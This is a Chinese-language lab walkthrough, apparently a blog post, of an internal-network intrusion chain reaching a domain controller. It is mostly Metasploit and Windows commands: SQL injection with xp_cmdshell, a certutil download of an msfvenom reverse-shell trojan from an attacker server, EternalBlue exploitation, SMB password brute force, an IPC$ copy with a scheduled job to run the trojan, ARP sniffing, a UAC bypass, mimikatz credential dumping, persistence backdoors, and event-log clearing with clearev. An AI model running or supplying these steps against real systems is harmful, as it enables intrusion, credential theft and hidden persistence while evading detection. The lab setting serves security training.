本文作者: 重生信安 - 鯊魚(yú)

? ? ? ? ? ? ? ? ? ? ? ? 實(shí)驗(yàn)拓?fù)鋱D

? ? ? ? ? ? ? ? ? ? 0x02 入侵1號(hào)機(jī)

1號(hào)機(jī)模擬外網(wǎng)web應(yīng)用，找到注入點(diǎn)

判斷為整形盲注，直接sqlmap跑一下權(quán)限.

Sqlserver 2008數(shù)據(jù)庫(kù)sa權(quán)限,2008數(shù)據(jù)庫(kù)默認(rèn)禁用xp_cmdshell，需要手動(dòng)開(kāi)啟。

EXEC sp_configure 'show advanced options',1//允許修改高級(jí)參數(shù)

RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1? //打開(kāi)xp_cmdshell擴(kuò)展

RECONFIGURE

開(kāi)啟后直接從注入點(diǎn)利用xp_cmdshell，執(zhí)行系統(tǒng)命令添加賬戶等操作。我這里選擇遠(yuǎn)程下載木馬，運(yùn)行木馬對(duì)系統(tǒng)進(jìn)行控制。生成木馬并把木馬放在192.168.31.135 web上提供下載。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.45 lport=4444 -f exe > /home/1.exe //生成msf木馬文件

certutil -urlcache -split -f http://192.168.31.135/test.exe c:\1.exe //遠(yuǎn)程下載木馬程序

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 本機(jī)ip

set lport 本機(jī)監(jiān)聽(tīng)端口

run

再通過(guò)xp_cmdshell執(zhí)行木馬。

接收到shell，getuid 查看當(dāng)前用戶權(quán)限，shell? 進(jìn)入交互式shell，目標(biāo)不在此主機(jī)，繼續(xù)進(jìn)行縱深。

background //掛起會(huì)話

route add 目標(biāo)網(wǎng)段 子掩碼? session號(hào) //添加一條路由去往目標(biāo)內(nèi)網(wǎng)；

? ? ? ? ? ? ? ? ? ? ? 0x03 入侵2號(hào)機(jī)

通過(guò)路由轉(zhuǎn)發(fā)對(duì)目標(biāo)內(nèi)網(wǎng)ms17-010漏洞主機(jī)進(jìn)行探測(cè)。

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.192.1/24

set threads 50

Run

發(fā)現(xiàn)一臺(tái)存在ms17-010 漏洞主機(jī)2號(hào)機(jī)，并設(shè)置exp進(jìn)行攻擊。

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.31.45

set lport 6666

set rhosts 192.168.192.135

Run

通過(guò)遠(yuǎn)程溢出拿下2號(hào)機(jī)，添加用戶開(kāi)啟3389，3389端口轉(zhuǎn)發(fā)。

run getgui -e //開(kāi)啟3389端口

portfwd add -l 1111 -p 3389 -r 192.168.192.135//將192.135主機(jī)3389轉(zhuǎn)發(fā)本機(jī)111

rdesktop -u 賬號(hào)? -p 密碼? ? 本機(jī)ip:端口? ? // 遠(yuǎn)程連接

可以再添加一條路由繼續(xù)進(jìn)行掃描擴(kuò)大戰(zhàn)果。

? ? ? ? ? ? ? ? ? ? 0x04 入侵3號(hào)機(jī)

通過(guò)路由轉(zhuǎn)發(fā)繼續(xù)掃描脆弱主機(jī)，smb弱口令

use auxiliary/scanner/smb/smb_login

set rhosts 192.168.192.1/24

set user_file /home/1.txt

set pass_file /home/2.txt

set threads 50

Run

192.168.192.129 弱口令 administrator 123456，目標(biāo)主機(jī)未開(kāi)啟3389，利用ipc入侵，回到2號(hào)機(jī)shell會(huì)話上 session -i 2 shell進(jìn)入交互會(huì)話。

net use \\192.168.192.129 "123456" /user:"administrator" //建立ipc連接

copy c:\\1.exe \\192.168.192.129\c$? ? //將本地c盤(pán)1.exe 拷貝到目標(biāo)c盤(pán)

net time \\192.168.192.129? ? //查看目標(biāo)時(shí)間

at \\192.168.192.129 23:59 c:\\1.exe? // 根據(jù)時(shí)間添加事件，時(shí)間一到執(zhí)行木馬

kali設(shè)置好監(jiān)聽(tīng)等待木馬執(zhí)行，反彈shell。

? ? ? ? ? ? ? ? ? ? 0x05 入侵4號(hào)機(jī)

利用3號(hào)機(jī)反彈的shell進(jìn)行arp嗅探。

load sniffer //加載嗅探模板

sniffer_interfaces //列出主機(jī)網(wǎng)卡

sniffer_start [數(shù)值]? //開(kāi)啟監(jiān)聽(tīng)

sniffer_dump 2 1.cap //導(dǎo)出監(jiān)聽(tīng)到的數(shù)據(jù)為1.cap

用戶登陸ftp，會(huì)被嗅探到明文密碼。

解cap嗅探包。

use auxiliary/sniffer/psnuffle

set pcapfile 1.cap

run

得到ftp明文木馬，然后遠(yuǎn)程到一臺(tái)主機(jī)通過(guò)ftp上傳webshell 大馬。

進(jìn)入大馬，找到可讀寫(xiě)目錄上傳木馬。

kali設(shè)置好監(jiān)聽(tīng)等待木馬執(zhí)行。

執(zhí)行并接收，權(quán)限很低利用getsystem提權(quán)失敗。

進(jìn)入shell，systeminfo命令查看已打的補(bǔ)丁，發(fā)現(xiàn)可以用ms15-051進(jìn)行提權(quán)。

search ms15 // 搜索ms15

額。。。。。好像提權(quán)失敗了，換思路先繞過(guò)UAC.

use exploit/windows/local/bypassuac

set session 4

Run

返回一個(gè)新的shell,進(jìn)入返回的新shell，直接getsystem進(jìn)行提權(quán)。

提權(quán)成功，接下來(lái)讀取明文密碼。

run hashdump //讀取用戶密碼hash

讀取失敗了，但是不要著急我們把shell注入到一個(gè)實(shí)體system進(jìn)程中。

ps? //查看所有進(jìn)程

migrate 1076? //將shell遷移到 1076 線程當(dāng)中

load mimikatz? //加載mimikatz

msv? //讀取用戶明文（hash）

拿到域管理用戶hash密碼，去破解一下。

? ? ? ? ? ? ? 0x06 拿下域控制器5號(hào)機(jī)

有了域控賬戶密碼可以在域里面暢通無(wú)阻，繼續(xù)用ipc拿下域控制器。

利用域管理員賬號(hào)密碼進(jìn)行ipc入侵，kali設(shè)置監(jiān)聽(tīng)得到反彈shell。

run getgui -e //開(kāi)啟3389端口

portfwd add -l 1111 -p 3389 -r 192.168.192.132

rdesktop -u administrator@guguyu.com -p P@ssw0rd 192.168.2.68:1111

成功拿下域控制器！

run persistence -X -i 5 -p 4444 -r 192.168.192.132 //向注冊(cè)表寫(xiě)入后門文件 開(kāi)機(jī)自啟 每5秒反彈一次shell

run metsvc //在主機(jī)上創(chuàng)建一個(gè)監(jiān)聽(tīng)31337端口的后門服務(wù)

clearev 清理痕跡。

不足之處，還請(qǐng)各位大佬多多指點(diǎn)?。。?！